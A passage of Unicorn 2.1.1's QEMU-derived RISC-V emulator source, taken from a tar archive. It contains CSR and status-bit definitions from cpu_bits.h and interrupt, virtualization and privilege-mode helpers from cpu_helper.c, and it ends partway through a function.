cpu_mmu_index(env, 0); if (riscv_cpu_fp_enabled(env)) { *flags |= env->mstatus & MSTATUS_FS; } } int riscv_csrrw(CPURISCVState *env, int csrno, target_ulong *ret_value, target_ulong new_value, target_ulong write_mask); int riscv_csrrw_debug(CPURISCVState *env, int csrno, target_ulong *ret_value, target_ulong new_value, target_ulong write_mask); static inline void riscv_csr_write(CPURISCVState *env, int csrno, target_ulong val) { 
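    /* Full-width write: all-ones write mask, previous value discarded
     * (ret_value == NULL). */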
riscv_csrrw(env, csrno, NULL, val, MAKE_64BIT_MASK(0, TARGET_LONG_BITS)); } static inline target_ulong riscv_csr_read(CPURISCVState *env, int csrno) { target_ulong val = 0; riscv_csrrw(env, csrno, &val, 0, 0); return val; } typedef int (*riscv_csr_predicate_fn)(CPURISCVState *env, int csrno); typedef int (*riscv_csr_read_fn)(CPURISCVState *env, int csrno, target_ulong *ret_value); typedef int (*riscv_csr_write_fn)(CPURISCVState *env, int csrno, target_ulong new_value); typedef int (*riscv_csr_op_fn)(CPURISCVState *env, int csrno, target_ulong *ret_value, target_ulong new_value, target_ulong write_mask); typedef struct { riscv_csr_predicate_fn predicate; riscv_csr_read_fn read; riscv_csr_write_fn write; riscv_csr_op_fn op; } riscv_csr_operations; void riscv_get_csr_ops(int csrno, riscv_csr_operations *ops); void riscv_set_csr_ops(int csrno, riscv_csr_operations *ops); void riscv_cpu_register_gdb_regs_for_features(CPUState *cs); typedef CPURISCVState CPUArchState; typedef RISCVCPU ArchCPU; #include "exec/cpu-all.h" #endif /* RISCV_CPU_H */ ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/riscv/cpu_bits.h����������������������������������������������������������0000664�0000000�0000000�00000046072�14675241067�0020561�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* RISC-V ISA constants */ #ifndef TARGET_RISCV_CPU_BITS_H #define TARGET_RISCV_CPU_BITS_H #define get_field(reg, mask) (((reg) & \ (target_ulong)(mask)) / ((mask) & ~((mask) << 1))) #define set_field(reg, mask, val) (((reg) & ~(target_ulong)(mask)) | \ (((target_ulong)(val) * ((mask) & ~((mask) << 1))) & \ (target_ulong)(mask))) /* Floating point round mode */ #define FSR_RD_SHIFT 5 #define FSR_RD (0x7 << FSR_RD_SHIFT) /* Floating point accrued exception flags */ #define FPEXC_NX 0x01 #define FPEXC_UF 0x02 #define FPEXC_OF 0x04 #define FPEXC_DZ 0x08 #define FPEXC_NV 0x10 /* Floating point status register bits */ #define FSR_AEXC_SHIFT 0 #define FSR_NVA (FPEXC_NV << FSR_AEXC_SHIFT) #define FSR_OFA (FPEXC_OF << FSR_AEXC_SHIFT) #define FSR_UFA (FPEXC_UF << FSR_AEXC_SHIFT) #define FSR_DZA (FPEXC_DZ << FSR_AEXC_SHIFT) #define FSR_NXA (FPEXC_NX << FSR_AEXC_SHIFT) #define FSR_AEXC (FSR_NVA | FSR_OFA | FSR_UFA | FSR_DZA | FSR_NXA) /* Control and Status Registers */ /* User Trap Setup */ #define CSR_USTATUS 0x000 #define CSR_UIE 0x004 #define CSR_UTVEC 0x005 /* User Trap Handling */ #define CSR_USCRATCH 0x040 #define CSR_UEPC 0x041 #define CSR_UCAUSE 0x042 #define CSR_UTVAL 0x043 #define CSR_UIP 0x044 /* User Floating-Point CSRs */ #define CSR_FFLAGS 0x001 #define CSR_FRM 0x002 #define CSR_FCSR 0x003 /* User Timers and Counters */ #define CSR_CYCLE 0xc00 #define CSR_TIME 0xc01 #define CSR_INSTRET 0xc02 #define CSR_HPMCOUNTER3 0xc03 #define CSR_HPMCOUNTER4 0xc04 #define CSR_HPMCOUNTER5 0xc05 #define CSR_HPMCOUNTER6 0xc06 #define CSR_HPMCOUNTER7 0xc07 #define CSR_HPMCOUNTER8 0xc08 #define CSR_HPMCOUNTER9 0xc09 #define CSR_HPMCOUNTER10 0xc0a #define CSR_HPMCOUNTER11 0xc0b #define CSR_HPMCOUNTER12 0xc0c #define 
CSR_HPMCOUNTER13 0xc0d #define CSR_HPMCOUNTER14 0xc0e #define CSR_HPMCOUNTER15 0xc0f #define CSR_HPMCOUNTER16 0xc10 #define CSR_HPMCOUNTER17 0xc11 #define CSR_HPMCOUNTER18 0xc12 #define CSR_HPMCOUNTER19 0xc13 #define CSR_HPMCOUNTER20 0xc14 #define CSR_HPMCOUNTER21 0xc15 #define CSR_HPMCOUNTER22 0xc16 #define CSR_HPMCOUNTER23 0xc17 #define CSR_HPMCOUNTER24 0xc18 #define CSR_HPMCOUNTER25 0xc19 #define CSR_HPMCOUNTER26 0xc1a #define CSR_HPMCOUNTER27 0xc1b #define CSR_HPMCOUNTER28 0xc1c #define CSR_HPMCOUNTER29 0xc1d #define CSR_HPMCOUNTER30 0xc1e #define CSR_HPMCOUNTER31 0xc1f #define CSR_CYCLEH 0xc80 #define CSR_TIMEH 0xc81 #define CSR_INSTRETH 0xc82 #define CSR_HPMCOUNTER3H 0xc83 #define CSR_HPMCOUNTER4H 0xc84 #define CSR_HPMCOUNTER5H 0xc85 #define CSR_HPMCOUNTER6H 0xc86 #define CSR_HPMCOUNTER7H 0xc87 #define CSR_HPMCOUNTER8H 0xc88 #define CSR_HPMCOUNTER9H 0xc89 #define CSR_HPMCOUNTER10H 0xc8a #define CSR_HPMCOUNTER11H 0xc8b #define CSR_HPMCOUNTER12H 0xc8c #define CSR_HPMCOUNTER13H 0xc8d #define CSR_HPMCOUNTER14H 0xc8e #define CSR_HPMCOUNTER15H 0xc8f #define CSR_HPMCOUNTER16H 0xc90 #define CSR_HPMCOUNTER17H 0xc91 #define CSR_HPMCOUNTER18H 0xc92 #define CSR_HPMCOUNTER19H 0xc93 #define CSR_HPMCOUNTER20H 0xc94 #define CSR_HPMCOUNTER21H 0xc95 #define CSR_HPMCOUNTER22H 0xc96 #define CSR_HPMCOUNTER23H 0xc97 #define CSR_HPMCOUNTER24H 0xc98 #define CSR_HPMCOUNTER25H 0xc99 #define CSR_HPMCOUNTER26H 0xc9a #define CSR_HPMCOUNTER27H 0xc9b #define CSR_HPMCOUNTER28H 0xc9c #define CSR_HPMCOUNTER29H 0xc9d #define CSR_HPMCOUNTER30H 0xc9e #define CSR_HPMCOUNTER31H 0xc9f /* Machine Timers and Counters */ #define CSR_MCYCLE 0xb00 #define CSR_MINSTRET 0xb02 #define CSR_MCYCLEH 0xb80 #define CSR_MINSTRETH 0xb82 /* Machine Information Registers */ #define CSR_MVENDORID 0xf11 #define CSR_MARCHID 0xf12 #define CSR_MIMPID 0xf13 #define CSR_MHARTID 0xf14 /* Machine Trap Setup */ #define CSR_MSTATUS 0x300 #define CSR_MISA 0x301 #define CSR_MEDELEG 0x302 #define CSR_MIDELEG 0x303 #define CSR_MIE 0x304 #define CSR_MTVEC 0x305 #define CSR_MCOUNTEREN 0x306 /* 32-bit only */ #define CSR_MSTATUSH 0x310 /* Legacy Counter Setup (priv v1.9.1) */ /* Update to #define CSR_MCOUNTINHIBIT 0x320 for 1.11.0 */ #define CSR_MUCOUNTEREN 0x320 #define CSR_MSCOUNTEREN 0x321 #define CSR_MHCOUNTEREN 0x322 /* Machine Trap Handling */ #define CSR_MSCRATCH 0x340 #define CSR_MEPC 0x341 #define CSR_MCAUSE 0x342 #define CSR_MTVAL 0x343 #define CSR_MIP 0x344 /* Legacy Machine Trap Handling (priv v1.9.1) */ #define CSR_MBADADDR 0x343 /* Supervisor Trap Setup */ #define CSR_SSTATUS 0x100 #define CSR_SEDELEG 0x102 #define CSR_SIDELEG 0x103 #define CSR_SIE 0x104 #define CSR_STVEC 0x105 #define CSR_SCOUNTEREN 0x106 /* Supervisor Trap Handling */ #define CSR_SSCRATCH 0x140 #define CSR_SEPC 0x141 #define CSR_SCAUSE 0x142 #define CSR_STVAL 0x143 #define CSR_SIP 0x144 /* Legacy Supervisor Trap Handling (priv v1.9.1) */ #define CSR_SBADADDR 0x143 /* Supervisor Protection and Translation */ #define CSR_SPTBR 0x180 #define CSR_SATP 0x180 /* Hpervisor CSRs */ #define CSR_HSTATUS 0x600 #define CSR_HEDELEG 0x602 #define CSR_HIDELEG 0x603 #define CSR_HIE 0x604 #define CSR_HCOUNTEREN 0x606 #define CSR_HTVAL 0x643 #define CSR_HIP 0x644 #define CSR_HTINST 0x64A #define CSR_HGATP 0x680 #define CSR_HTIMEDELTA 0x605 #define CSR_HTIMEDELTAH 0x615 #if defined(TARGET_RISCV32) #define HGATP_MODE SATP32_MODE #define HGATP_VMID SATP32_ASID #define HGATP_PPN SATP32_PPN #endif #if defined(TARGET_RISCV64) #define HGATP_MODE SATP64_MODE #define HGATP_VMID SATP64_ASID #define 
HGATP_PPN SATP64_PPN #endif /* Virtual CSRs */ #define CSR_VSSTATUS 0x200 #define CSR_VSIE 0x204 #define CSR_VSTVEC 0x205 #define CSR_VSSCRATCH 0x240 #define CSR_VSEPC 0x241 #define CSR_VSCAUSE 0x242 #define CSR_VSTVAL 0x243 #define CSR_VSIP 0x244 #define CSR_VSATP 0x280 #define CSR_MTINST 0x34a #define CSR_MTVAL2 0x34b /* Physical Memory Protection */ #define CSR_PMPCFG0 0x3a0 #define CSR_PMPCFG1 0x3a1 #define CSR_PMPCFG2 0x3a2 #define CSR_PMPCFG3 0x3a3 #define CSR_PMPADDR0 0x3b0 #define CSR_PMPADDR1 0x3b1 #define CSR_PMPADDR2 0x3b2 #define CSR_PMPADDR3 0x3b3 #define CSR_PMPADDR4 0x3b4 #define CSR_PMPADDR5 0x3b5 #define CSR_PMPADDR6 0x3b6 #define CSR_PMPADDR7 0x3b7 #define CSR_PMPADDR8 0x3b8 #define CSR_PMPADDR9 0x3b9 #define CSR_PMPADDR10 0x3ba #define CSR_PMPADDR11 0x3bb #define CSR_PMPADDR12 0x3bc #define CSR_PMPADDR13 0x3bd #define CSR_PMPADDR14 0x3be #define CSR_PMPADDR15 0x3bf /* Debug/Trace Registers (shared with Debug Mode) */ #define CSR_TSELECT 0x7a0 #define CSR_TDATA1 0x7a1 #define CSR_TDATA2 0x7a2 #define CSR_TDATA3 0x7a3 /* Debug Mode Registers */ #define CSR_DCSR 0x7b0 #define CSR_DPC 0x7b1 #define CSR_DSCRATCH 0x7b2 /* Performance Counters */ #define CSR_MHPMCOUNTER3 0xb03 #define CSR_MHPMCOUNTER4 0xb04 #define CSR_MHPMCOUNTER5 0xb05 #define CSR_MHPMCOUNTER6 0xb06 #define CSR_MHPMCOUNTER7 0xb07 #define CSR_MHPMCOUNTER8 0xb08 #define CSR_MHPMCOUNTER9 0xb09 #define CSR_MHPMCOUNTER10 0xb0a #define CSR_MHPMCOUNTER11 0xb0b #define CSR_MHPMCOUNTER12 0xb0c #define CSR_MHPMCOUNTER13 0xb0d #define CSR_MHPMCOUNTER14 0xb0e #define CSR_MHPMCOUNTER15 0xb0f #define CSR_MHPMCOUNTER16 0xb10 #define CSR_MHPMCOUNTER17 0xb11 #define CSR_MHPMCOUNTER18 0xb12 #define CSR_MHPMCOUNTER19 0xb13 #define CSR_MHPMCOUNTER20 0xb14 #define CSR_MHPMCOUNTER21 0xb15 #define CSR_MHPMCOUNTER22 0xb16 #define CSR_MHPMCOUNTER23 0xb17 #define CSR_MHPMCOUNTER24 0xb18 #define CSR_MHPMCOUNTER25 0xb19 #define CSR_MHPMCOUNTER26 0xb1a #define CSR_MHPMCOUNTER27 0xb1b #define CSR_MHPMCOUNTER28 0xb1c #define CSR_MHPMCOUNTER29 0xb1d #define CSR_MHPMCOUNTER30 0xb1e #define CSR_MHPMCOUNTER31 0xb1f #define CSR_MHPMEVENT3 0x323 #define CSR_MHPMEVENT4 0x324 #define CSR_MHPMEVENT5 0x325 #define CSR_MHPMEVENT6 0x326 #define CSR_MHPMEVENT7 0x327 #define CSR_MHPMEVENT8 0x328 #define CSR_MHPMEVENT9 0x329 #define CSR_MHPMEVENT10 0x32a #define CSR_MHPMEVENT11 0x32b #define CSR_MHPMEVENT12 0x32c #define CSR_MHPMEVENT13 0x32d #define CSR_MHPMEVENT14 0x32e #define CSR_MHPMEVENT15 0x32f #define CSR_MHPMEVENT16 0x330 #define CSR_MHPMEVENT17 0x331 #define CSR_MHPMEVENT18 0x332 #define CSR_MHPMEVENT19 0x333 #define CSR_MHPMEVENT20 0x334 #define CSR_MHPMEVENT21 0x335 #define CSR_MHPMEVENT22 0x336 #define CSR_MHPMEVENT23 0x337 #define CSR_MHPMEVENT24 0x338 #define CSR_MHPMEVENT25 0x339 #define CSR_MHPMEVENT26 0x33a #define CSR_MHPMEVENT27 0x33b #define CSR_MHPMEVENT28 0x33c #define CSR_MHPMEVENT29 0x33d #define CSR_MHPMEVENT30 0x33e #define CSR_MHPMEVENT31 0x33f #define CSR_MHPMCOUNTER3H 0xb83 #define CSR_MHPMCOUNTER4H 0xb84 #define CSR_MHPMCOUNTER5H 0xb85 #define CSR_MHPMCOUNTER6H 0xb86 #define CSR_MHPMCOUNTER7H 0xb87 #define CSR_MHPMCOUNTER8H 0xb88 #define CSR_MHPMCOUNTER9H 0xb89 #define CSR_MHPMCOUNTER10H 0xb8a #define CSR_MHPMCOUNTER11H 0xb8b #define CSR_MHPMCOUNTER12H 0xb8c #define CSR_MHPMCOUNTER13H 0xb8d #define CSR_MHPMCOUNTER14H 0xb8e #define CSR_MHPMCOUNTER15H 0xb8f #define CSR_MHPMCOUNTER16H 0xb90 #define CSR_MHPMCOUNTER17H 0xb91 #define CSR_MHPMCOUNTER18H 0xb92 #define CSR_MHPMCOUNTER19H 0xb93 #define CSR_MHPMCOUNTER20H 0xb94 
#define CSR_MHPMCOUNTER21H 0xb95 #define CSR_MHPMCOUNTER22H 0xb96 #define CSR_MHPMCOUNTER23H 0xb97 #define CSR_MHPMCOUNTER24H 0xb98 #define CSR_MHPMCOUNTER25H 0xb99 #define CSR_MHPMCOUNTER26H 0xb9a #define CSR_MHPMCOUNTER27H 0xb9b #define CSR_MHPMCOUNTER28H 0xb9c #define CSR_MHPMCOUNTER29H 0xb9d #define CSR_MHPMCOUNTER30H 0xb9e #define CSR_MHPMCOUNTER31H 0xb9f /* Legacy Machine Protection and Translation (priv v1.9.1) */ #define CSR_MBASE 0x380 #define CSR_MBOUND 0x381 #define CSR_MIBASE 0x382 #define CSR_MIBOUND 0x383 #define CSR_MDBASE 0x384 #define CSR_MDBOUND 0x385 /* mstatus CSR bits */ #define MSTATUS_UIE 0x00000001 #define MSTATUS_SIE 0x00000002 #define MSTATUS_MIE 0x00000008 #define MSTATUS_UPIE 0x00000010 #define MSTATUS_SPIE 0x00000020 #define MSTATUS_MPIE 0x00000080 #define MSTATUS_SPP 0x00000100 #define MSTATUS_MPP 0x00001800 #define MSTATUS_FS 0x00006000 #define MSTATUS_XS 0x00018000 #define MSTATUS_MPRV 0x00020000 #define MSTATUS_PUM 0x00040000 /* until: priv-1.9.1 */ #define MSTATUS_SUM 0x00040000 /* since: priv-1.10 */ #define MSTATUS_MXR 0x00080000 #define MSTATUS_VM 0x1F000000 /* until: priv-1.9.1 */ #define MSTATUS_TVM 0x00100000 /* since: priv-1.10 */ #define MSTATUS_TW 0x20000000 /* since: priv-1.10 */ #define MSTATUS_TSR 0x40000000 /* since: priv-1.10 */ #if defined(TARGET_RISCV64) #define MSTATUS_MTL 0x4000000000ULL #define MSTATUS_MPV 0x8000000000ULL #elif defined(TARGET_RISCV32) #define MSTATUS_MTL 0x00000040 #define MSTATUS_MPV 0x00000080 #endif #ifdef TARGET_RISCV32 # define MSTATUS_MPV_ISSET(env) get_field(env->mstatush, MSTATUS_MPV) #else # define MSTATUS_MPV_ISSET(env) get_field(env->mstatus, MSTATUS_MPV) #endif #define MSTATUS64_UXL 0x0000000300000000ULL #define MSTATUS64_SXL 0x0000000C00000000ULL #define MSTATUS32_SD 0x80000000 #define MSTATUS64_SD 0x8000000000000000ULL #define MISA32_MXL 0xC0000000 #define MISA64_MXL 0xC000000000000000ULL #define MXL_RV32 1 #define MXL_RV64 2 #define MXL_RV128 3 #if defined(TARGET_RISCV32) #define MSTATUS_SD MSTATUS32_SD #define MISA_MXL MISA32_MXL #define MXL_VAL MXL_RV32 #elif defined(TARGET_RISCV64) #define MSTATUS_SD MSTATUS64_SD #define MISA_MXL MISA64_MXL #define MXL_VAL MXL_RV64 #endif /* sstatus CSR bits */ #define SSTATUS_UIE 0x00000001 #define SSTATUS_SIE 0x00000002 #define SSTATUS_UPIE 0x00000010 #define SSTATUS_SPIE 0x00000020 #define SSTATUS_SPP 0x00000100 #define SSTATUS_FS 0x00006000 #define SSTATUS_XS 0x00018000 #define SSTATUS_PUM 0x00040000 /* until: priv-1.9.1 */ #define SSTATUS_SUM 0x00040000 /* since: priv-1.10 */ #define SSTATUS_MXR 0x00080000 #define SSTATUS32_SD 0x80000000 #define SSTATUS64_SD 0x8000000000000000ULL #if defined(TARGET_RISCV32) #define SSTATUS_SD SSTATUS32_SD #elif defined(TARGET_RISCV64) #define SSTATUS_SD SSTATUS64_SD #endif /* hstatus CSR bits */ #define HSTATUS_SPRV 0x00000001 #define HSTATUS_SPV 0x00000080 #define HSTATUS_SP2P 0x00000100 #define HSTATUS_SP2V 0x00000200 #define HSTATUS_VTVM 0x00100000 #define HSTATUS_VTW 0x00200000 #define HSTATUS_VTSR 0x00400000 #define HSTATUS32_WPRI 0xFF8FF87E #define HSTATUS64_WPRI 0xFFFFFFFFFF8FF87EULL #if defined(TARGET_RISCV32) #define HSTATUS_WPRI HSTATUS32_WPRI #elif defined(TARGET_RISCV64) #define HSTATUS_WPRI HSTATUS64_WPRI #endif /* Privilege modes */ #define PRV_U 0 #define PRV_S 1 #define PRV_H 2 /* Reserved */ #define PRV_M 3 /* Virtulisation Register Fields */ #define VIRT_ONOFF 1 /* This is used to save state for when we take an exception. 
If this is set * that means that we want to force a HS level exception (no matter what the * delegation is set to). This will occur for things such as a second level * page table fault. */ #define FORCE_HS_EXCEP 2 /* RV32 satp CSR field masks */ #define SATP32_MODE 0x80000000 #define SATP32_ASID 0x7fc00000 #define SATP32_PPN 0x003fffff /* RV64 satp CSR field masks */ #define SATP64_MODE 0xF000000000000000ULL #define SATP64_ASID 0x0FFFF00000000000ULL #define SATP64_PPN 0x00000FFFFFFFFFFFULL #if defined(TARGET_RISCV32) #define SATP_MODE SATP32_MODE #define SATP_ASID SATP32_ASID #define SATP_PPN SATP32_PPN #endif #if defined(TARGET_RISCV64) #define SATP_MODE SATP64_MODE #define SATP_ASID SATP64_ASID #define SATP_PPN SATP64_PPN #endif /* VM modes (mstatus.vm) privileged ISA 1.9.1 */ #define VM_1_09_MBARE 0 #define VM_1_09_MBB 1 #define VM_1_09_MBBID 2 #define VM_1_09_SV32 8 #define VM_1_09_SV39 9 #define VM_1_09_SV48 10 /* VM modes (satp.mode) privileged ISA 1.10 */ #define VM_1_10_MBARE 0 #define VM_1_10_SV32 1 #define VM_1_10_SV39 8 #define VM_1_10_SV48 9 #define VM_1_10_SV57 10 #define VM_1_10_SV64 11 /* Page table entry (PTE) fields */ #define PTE_V 0x001 /* Valid */ #define PTE_R 0x002 /* Read */ #define PTE_W 0x004 /* Write */ #define PTE_X 0x008 /* Execute */ #define PTE_U 0x010 /* User */ #define PTE_G 0x020 /* Global */ #define PTE_A 0x040 /* Accessed */ #define PTE_D 0x080 /* Dirty */ #define PTE_SOFT 0x300 /* Reserved for Software */ /* Page table PPN shift amount */ #define PTE_PPN_SHIFT 10 /* Leaf page shift amount */ #define PGSHIFT 12 /* Default Reset Vector adress */ #define DEFAULT_RSTVEC 0x1000 /* Exception causes */ #define EXCP_NONE -1 /* sentinel value */ #define RISCV_EXCP_INST_ADDR_MIS 0x0 #define RISCV_EXCP_INST_ACCESS_FAULT 0x1 #define RISCV_EXCP_ILLEGAL_INST 0x2 #define RISCV_EXCP_BREAKPOINT 0x3 #define RISCV_EXCP_LOAD_ADDR_MIS 0x4 #define RISCV_EXCP_LOAD_ACCESS_FAULT 0x5 #define RISCV_EXCP_STORE_AMO_ADDR_MIS 0x6 #define RISCV_EXCP_STORE_AMO_ACCESS_FAULT 0x7 #define RISCV_EXCP_U_ECALL 0x8 #define RISCV_EXCP_S_ECALL 0x9 #define RISCV_EXCP_VS_ECALL 0xa #define RISCV_EXCP_M_ECALL 0xb #define RISCV_EXCP_INST_PAGE_FAULT 0xc /* since: priv-1.10.0 */ #define RISCV_EXCP_LOAD_PAGE_FAULT 0xd /* since: priv-1.10.0 */ #define RISCV_EXCP_STORE_PAGE_FAULT 0xf /* since: priv-1.10.0 */ #define RISCV_EXCP_INST_GUEST_PAGE_FAULT 0x14 #define RISCV_EXCP_LOAD_GUEST_ACCESS_FAULT 0x15 #define RISCV_EXCP_STORE_GUEST_AMO_ACCESS_FAULT 0x17 #define RISCV_EXCP_UNICORN_END 0x8888 #define RISCV_EXCP_INT_FLAG 0x80000000 #define RISCV_EXCP_INT_MASK 0x7fffffff /* Interrupt causes */ #define IRQ_U_SOFT 0 #define IRQ_S_SOFT 1 #define IRQ_VS_SOFT 2 #define IRQ_M_SOFT 3 #define IRQ_U_TIMER 4 #define IRQ_S_TIMER 5 #define IRQ_VS_TIMER 6 #define IRQ_M_TIMER 7 #define IRQ_U_EXT 8 #define IRQ_S_EXT 9 #define IRQ_VS_EXT 10 #define IRQ_M_EXT 11 /* mip masks */ #define MIP_USIP (1 << IRQ_U_SOFT) #define MIP_SSIP (1 << IRQ_S_SOFT) #define MIP_VSSIP (1 << IRQ_VS_SOFT) #define MIP_MSIP (1 << IRQ_M_SOFT) #define MIP_UTIP (1 << IRQ_U_TIMER) #define MIP_STIP (1 << IRQ_S_TIMER) #define MIP_VSTIP (1 << IRQ_VS_TIMER) #define MIP_MTIP (1 << IRQ_M_TIMER) #define MIP_UEIP (1 << IRQ_U_EXT) #define MIP_SEIP (1 << IRQ_S_EXT) #define MIP_VSEIP (1 << IRQ_VS_EXT) #define MIP_MEIP (1 << IRQ_M_EXT) /* sip masks */ #define SIP_SSIP MIP_SSIP #define SIP_STIP MIP_STIP #define SIP_SEIP MIP_SEIP /* MIE masks */ #define MIE_SEIE (1 << IRQ_S_EXT) #define MIE_UEIE (1 << IRQ_U_EXT) #define MIE_STIE (1 << IRQ_S_TIMER) #define MIE_UTIE (1 << 
unicorn-2.1.1/qemu/target/riscv/cpu_helper.c

/*
 * RISC-V CPU helpers for qemu.
 *
 * Copyright (c) 2016-2017 Sagar Karandikar, sagark@eecs.berkeley.edu
 * Copyright (c) 2017-2018 SiFive, Inc.
 *
 * This program is free software; you can redistribute it and/or modify it
 * under the terms and conditions of the GNU General Public License,
 * version 2 or later, as published by the Free Software Foundation.
 *
 * This program is distributed in the hope it will be useful, but WITHOUT
 * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
 * FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
 * more details.
 *
 * You should have received a copy of the GNU General Public License along with
 * this program. If not, see <http://www.gnu.org/licenses/>.
*/
#include "qemu/osdep.h"
#include "qemu/log.h"
#include "cpu.h"
#include "exec/exec-all.h"
#include "tcg/tcg-op.h"

int riscv_cpu_mmu_index(CPURISCVState *env, bool ifetch)
{
    return env->priv;
}

static int riscv_cpu_local_irq_pending(CPURISCVState *env)
{
    target_ulong irqs;

    target_ulong mstatus_mie = get_field(env->mstatus, MSTATUS_MIE);
    target_ulong mstatus_sie = get_field(env->mstatus, MSTATUS_SIE);
    target_ulong hs_mstatus_sie = get_field(env->mstatus_hs, MSTATUS_SIE);

    target_ulong pending = env->mip & env->mie &
                               ~(MIP_VSSIP | MIP_VSTIP | MIP_VSEIP);
    target_ulong vspending = (env->mip & env->mie &
                              (MIP_VSSIP | MIP_VSTIP | MIP_VSEIP));

    target_ulong mie = env->priv < PRV_M ||
                       (env->priv == PRV_M && mstatus_mie);
    target_ulong sie = env->priv < PRV_S ||
                       (env->priv == PRV_S && mstatus_sie);
    target_ulong hs_sie = env->priv < PRV_S ||
                          (env->priv == PRV_S && hs_mstatus_sie);

    if (riscv_cpu_virt_enabled(env)) {
#ifdef _MSC_VER
        target_ulong pending_hs_irq = pending & (0 - hs_sie);
#else
        target_ulong pending_hs_irq = pending & -hs_sie;
#endif

        if (pending_hs_irq) {
            riscv_cpu_set_force_hs_excep(env, FORCE_HS_EXCEP);
            return ctz64(pending_hs_irq);
        }

        pending = vspending;
    }

#ifdef _MSC_VER
    irqs = (pending & ~env->mideleg & (0 - mie)) |
           (pending & env->mideleg & (0 - sie));
#else
    irqs = (pending & ~env->mideleg & -mie) | (pending & env->mideleg & -sie);
#endif

    if (irqs) {
        return ctz64(irqs); /* since non-zero */
    } else {
        return EXCP_NONE; /* indicates no pending interrupt */
    }
}

bool riscv_cpu_exec_interrupt(CPUState *cs, int interrupt_request)
{
    if (interrupt_request & CPU_INTERRUPT_HARD) {
        RISCVCPU *cpu = RISCV_CPU(cs);
        CPURISCVState *env = &cpu->env;
        int interruptno = riscv_cpu_local_irq_pending(env);
        if (interruptno >= 0) {
            cs->exception_index = RISCV_EXCP_INT_FLAG | interruptno;
            riscv_cpu_do_interrupt(cs);
            return true;
        }
    }
    return false;
}

/* Return true if floating-point support is currently enabled */
bool riscv_cpu_fp_enabled(CPURISCVState *env)
{
    if (env->mstatus & MSTATUS_FS) {
        if (riscv_cpu_virt_enabled(env) && !(env->mstatus_hs & MSTATUS_FS)) {
            return false;
        }
        return true;
    }

    return false;
}

void riscv_cpu_swap_hypervisor_regs(CPURISCVState *env)
{
    target_ulong mstatus_mask = MSTATUS_MXR | MSTATUS_SUM | MSTATUS_FS |
                                MSTATUS_SPP | MSTATUS_SPIE | MSTATUS_SIE;
    bool current_virt = riscv_cpu_virt_enabled(env);

    g_assert(riscv_has_ext(env, RVH));

#if defined(TARGET_RISCV64)
    mstatus_mask |= MSTATUS64_UXL;
#endif

    if (current_virt) {
        /* Current V=1 and we are about to change to V=0 */
        env->vsstatus = env->mstatus & mstatus_mask;
        env->mstatus &= ~mstatus_mask;
        env->mstatus |= env->mstatus_hs;
#if defined(TARGET_RISCV32)
        env->vsstatush = env->mstatush;
        env->mstatush |= env->mstatush_hs;
#endif
        env->vstvec = env->stvec;
        env->stvec = env->stvec_hs;

        env->vsscratch = env->sscratch;
        env->sscratch = env->sscratch_hs;

        env->vsepc = env->sepc;
        env->sepc = env->sepc_hs;

        env->vscause = env->scause;
        env->scause = env->scause_hs;

        env->vstval = env->sbadaddr;
        env->sbadaddr = env->stval_hs;

        env->vsatp = env->satp;
        env->satp = env->satp_hs;
    } else {
        /* Current V=0 and we are about to change to V=1 */
        env->mstatus_hs = env->mstatus & mstatus_mask;
        env->mstatus &= ~mstatus_mask;
        env->mstatus |= env->vsstatus;
#if defined(TARGET_RISCV32)
        env->mstatush_hs = env->mstatush;
        env->mstatush |= env->vsstatush;
#endif
        env->stvec_hs = env->stvec;
        env->stvec = env->vstvec;

        env->sscratch_hs = env->sscratch;
        env->sscratch = env->vsscratch;

        env->sepc_hs = env->sepc;
        env->sepc = env->vsepc;

        env->scause_hs = env->scause;
        env->scause =
env->vscause; env->stval_hs = env->sbadaddr; env->sbadaddr = env->vstval; env->satp_hs = env->satp; env->satp = env->vsatp; } } bool riscv_cpu_virt_enabled(CPURISCVState *env) { if (!riscv_has_ext(env, RVH)) { return false; } return get_field(env->virt, VIRT_ONOFF); } void riscv_cpu_set_virt_enabled(CPURISCVState *env, bool enable) { if (!riscv_has_ext(env, RVH)) { return; } /* Flush the TLB on all virt mode changes. */ if (get_field(env->virt, VIRT_ONOFF) != enable) { tlb_flush(env_cpu(env)); } env->virt = set_field(env->virt, VIRT_ONOFF, enable); } bool riscv_cpu_force_hs_excep_enabled(CPURISCVState *env) { if (!riscv_has_ext(env, RVH)) { return false; } return get_field(env->virt, FORCE_HS_EXCEP); } void riscv_cpu_set_force_hs_excep(CPURISCVState *env, bool enable) { if (!riscv_has_ext(env, RVH)) { return; } env->virt = set_field(env->virt, FORCE_HS_EXCEP, enable); } int riscv_cpu_claim_interrupts(RISCVCPU *cpu, uint32_t interrupts) { CPURISCVState *env = &cpu->env; if (env->miclaim & interrupts) { return -1; } else { env->miclaim |= interrupts; return 0; } } uint32_t riscv_cpu_update_mip(RISCVCPU *cpu, uint32_t mask, uint32_t value) { CPURISCVState *env = &cpu->env; CPUState *cs = CPU(cpu); uint32_t old = env->mip; env->mip = (env->mip & ~mask) | (value & mask); if (env->mip) { cpu_interrupt(cs, CPU_INTERRUPT_HARD); } else { cpu_reset_interrupt(cs, CPU_INTERRUPT_HARD); } return old; } void riscv_cpu_set_rdtime_fn(CPURISCVState *env, uint64_t (*fn)(void)) { env->rdtime_fn = fn; } void riscv_cpu_set_mode(CPURISCVState *env, target_ulong newpriv) { if (newpriv > PRV_M) { g_assert_not_reached(); } if (newpriv == PRV_H) { newpriv = PRV_U; } /* tlb_flush is unnecessary as mode is contained in mmu_idx */ env->priv = newpriv; /* * Clear the load reservation - otherwise a reservation placed in one * context/process can be used by another, resulting in an SC succeeding * incorrectly. Version 2.2 of the ISA specification explicitly requires * this behaviour, while later revisions say that the kernel "should" use * an SC instruction to force the yielding of a load reservation on a * preemptive context switch. As a result, do both. */ env->load_res = -1; } /* get_physical_address - get the physical address for this virtual address * * Do a page table walk to obtain the physical address corresponding to a * virtual address. Returns 0 if the translation was successful * * Adapted from Spike's mmu_t::translate and mmu_t::walk * * @env: CPURISCVState * @physical: This will be set to the calculated physical address * @prot: The returned protection attributes * @addr: The virtual address to be translated * @access_type: The type of MMU access * @mmu_idx: Indicates current privilege level * @first_stage: Are we in first stage translation? * Second stage is used for hypervisor guest translation * @two_stage: Are we going to perform two stage translation */ static int get_physical_address(CPURISCVState 